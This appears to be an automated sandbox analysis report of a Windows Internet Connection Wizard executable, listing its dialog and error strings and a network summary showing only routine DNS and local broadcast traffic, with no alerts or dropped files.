The Internet Connection wizard has detected that you have multiple dialing settings. Confirm your area code and country/region below then click Next.
I am &dialing from:
6ICW_GROUPBOX
Area Code:
Country / region:
NativeFontCtl
Internet Connection Wizard
MS Shell Dlg
ICW_STATIC
ICW_STATIC
Referral service phone number:
ICW_STATIC
ICW_STATIC
msctls_progress32
Progress2
Internet Connection Wizard
MS Shell Dlg
Completing the Internet Connection Wizard
After you close this wizard, you can connect to the Internet at any time by clicking Internet on the Start Menu.
&To connect to the Internet immediately, select this box and then click Finish.
ICW_STATIC
To close the wizard, click Finish
Internet Connection Wizard
MS Shell Dlg
You have successfully completed the Internet Connection wizard.
Your computer is now configured to connect to your new Internet account.
After you close this wizard, you can connect to the Internet at any time by clicking Internet on the Start Menu.
&To connect to the Internet immediately, select this box and then click Finish.
ICW_STATIC
To close the wizard, click Finish
Internet Connection Wizard
MS Shell Dlg
You can configure your computer for your online service by double-clicking its icon found on the desktop or in the Online Services folder. If you don't see this icon, reinstall the software provided by your online service.
Click Finish to close the Internet Connection wizard.
Internet Connection Wizard
MS Shell Dlg
ICW_STATIC
N&umber to dial:
Current &modem:
Select a new phone number:
&Change Number...
Change how the number is dialed:
&Dialing Properties...
Get troubleshooting help:
ICW_STATIC
NativeFontCtl
Internet Connection Wizard
MS Shell Dlg
Get troubleshooting help:
Internet Connection Wizard
MS Shell Dlg
The Internet Connection wizard has found several phone numbers for the Microsoft Internet Referral Service in your area. Select a number and then click Next.
&Phone numbers:
Internet Connection Wizard
MS Shell Dlg
Internet Connection Wizard
MS Shell Dlg
&Do not show the Internet Connection wizard in the future
The Internet Connection wizard has not finished setting up your Internet connection.
Are you sure you want to close the wizard?
Internet Connection Wizard
MS Shell Dlg
Do you want to continue creating or updating a connection?
Internet Connection Wizard
MS Shell Dlg
This computer does not have an Internet connection.
To create one, you can set up an Internet account with the Internet service provider (ISP) offered by your computer manufacturer, or use the New Connection Wizard to select another connection method.
What do you want to do?
&View the ISP offer provided by my computer manufacturer
&Run the New Connection Wizard so I can select another connection method
Cancel
Internet Connection Wizard
Connect to the Internet
ICWCONN1.EXE
The Internet Connection wizard has not finished setting up your Internet connection.
Are you sure you want to close the wizard?
Outlook Express
MSIMN.EXE
You have chosen not to accept the service agreement.
Click OK to review the service agreement again or Cancel to quit the Internet Connection wizard.7Please enter the required information, then click Next.KThe Internet Connection wizard cannot save Internet-connection information.
The Internet Connection wizard could not automatically shut down and restart your computer. Please restart your computer manually.zThe Internet Connection wizard will now restart your computer.
Close any programs that are still running, then click OK. <After your computer has restarted, the wizard will continue.
&Finish
Cancel
&Tutorial1You already have an Internet connection using %1.
You have successfully completed the Internet Connection wizard.
Your computer is now configured to connect to your new Internet account.
You have successfully completed the Internet Connection wizard.
Your computer is now configured to connect to your existing Internet account.
You have successfully completed the Internet Connection wizard.
Your computer is now configured to connect to your Internet account.CAn error occurred while configuring your Internet account with %s. ;An error occurred while configuring your Internet account.
If you experience problems connecting to the Internet with Internet Explorer or sending and receiving email with Outlook Express, you can call %s for technical support.
If you experience problems connecting to the Internet with Internet Explorer or sending and receiving email with Outlook Express, you can call your computer manufacturer for technical support.3There was an error setting up your Internet account$
To close the wizard, click Finish.(Helps you set up an Internet connection.
You do not have sufficient privileges to complete the Internet Connection wizard. To connect to the Internet via a corporate network, right-click the Internet Explorer icon,
yYou are restricted from running the Internet Connection wizard.
Contact your Network Administrator for more information.
Access Denied
You are restricted from running the Internet Connection wizard because you are not an administrator on this machine.
Contact your Network Administrator for more information.
Access Denied
2Congratulations! You are ready to use the Internet
DesktopwThe connection to the Microsoft Internet Referral Service has been interrupted. Click Next to reconnect to the service.
*Setting up an existing Internet connection3Step 1 of 3: Selecting an Internet service provider
an Internet service provider
XWe're ready to sign you up to %1. To complete the Internet sign up process click Finish.
)For automated telephone assistance call: lIf you have an Internet service provider account, you can use your phone line and a modem to connect to it. nIf your computer is connected to a local area network (LAN), you can gain access to the Internet over the LAN.
The Internet Connection wizard could not retrieve a list of Internet service providers because your hard drive is full.
To use the Internet Connection wizard remove some files from your hard drive and then click Next.
Unable to Connect
Server Error
The Internet Connection wizard will now connect to the Microsoft Internet Referral Service to retrieve a list of the Internet service providers in your area. PService providers connect your computer to the Internet through your phone line.
Verdana
The Internet Connection wizard could not retrieve a list of Internet service providers because Internet Explorer is currently set to Work Offline.
To use the Internet Connection wizard uncheck Work Offline from Internet Explorer's File menu and then click Next.
click Properties, click the Connections tab, click LAN Settings, and then complete the dialog box. To connect using a modem, contact your administrator for information.
You must be logged on to your computer for the Internet Connection wizard to successfully complete.
Would you like to have Windows restart so that you can logon? Be sure to close
any programs that are still running before clicking Yes.
After your computer has restarted, please logon, and the wizard will continue.
The Internet Connection wizard has not finished setting up your Internet connection.
Are you sure you want to close the wizard?
?Unable to run the Internet Connection wizard. Please try again.ZThere is not enough memory to continue. Close down one or more applications and try again.
icwhelp.dllPFailed to register or unregister the Internet Connection wizard helper component>Failed to load the Internet Connection wizard helper component^Failed to locate the dll registration entry in the Internet Connection wizard helper component
icwutil.dll
icwconn.dll
#Setting up your Internet connection
< &Back
&Next >
cThe Internet Connection wizard failed to run with OEM customizations from the following reason
#Not started from an OEM entry point
A Windows API failed
Not enough memory/No Transparent color was specified for a button'No font size was specified for a button+No left position was specified for a button'No font face was specified for a buttonkThe header parameters could not be processed because the font could not be created, or a Windows API failed
The button parameters could not be processed because the font could not be created, the bitmaps could not be loaded, or a windows API failedQThe background bitmap is too small to fit the buttons, header, and wizard windowsNThe top position of the wizard window causes it to extend into the button areacThe left position of the wizard window causes it to extend beyond the right edge of the application<The background bitmap was not specified or can not be loaded?The first page HTML file was not specified or can not be loadedBThe OEM Customization file, OEMCUST.INI, cannot be found or loaded

DNS

Name Response Post-Analysis Lookup
dns.msftncsi.com A 131.107.255.255 131.107.255.255
dns.msftncsi.com AAAA fd3e:4f5a:5b81::1 131.107.255.255

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 53179 224.0.0.252 5355
192.168.56.101 49642 224.0.0.252 5355
192.168.56.101 137 192.168.56.255 137
192.168.56.101 61714 114.114.114.114 53
192.168.56.101 56933 114.114.114.114 53
192.168.56.101 138 192.168.56.255 138

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.